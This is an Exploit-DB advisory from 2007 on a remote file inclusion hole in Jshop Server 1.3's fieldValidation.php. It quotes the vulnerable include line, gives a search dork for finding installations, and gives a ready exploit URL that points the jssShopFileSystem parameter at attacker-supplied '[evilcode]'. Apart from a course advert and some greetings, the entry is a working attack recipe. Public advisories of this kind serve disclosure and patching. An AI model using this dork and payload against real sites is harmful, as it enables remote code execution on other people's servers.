Jshop Server 1.3 - 'fieldValidation.php' Remote File Inclusion

EDB-ID:

3113


Author:

irvian

Type:

webapps


Platform:

PHP

Date:

2007-01-10


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

==========================================================================
# scripts       : Jshop Server 1.3
# Discovered By : irvian
# script        : http://www.jshop.co.uk/
# Thanks To     : #hitamputih #nyubicrew #patihack
# special To    : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz
# dork          :powered by jshop
--------------------------------------------------------------------------
file: routines/fieldValidation.php

include($jssShopFileSystem."resources/includes/validations.php");


exploit : www.target.com/routines/fieldValidation.php?jssShopFileSystem=[evilcode]

# milw0rm.com [2007-01-10]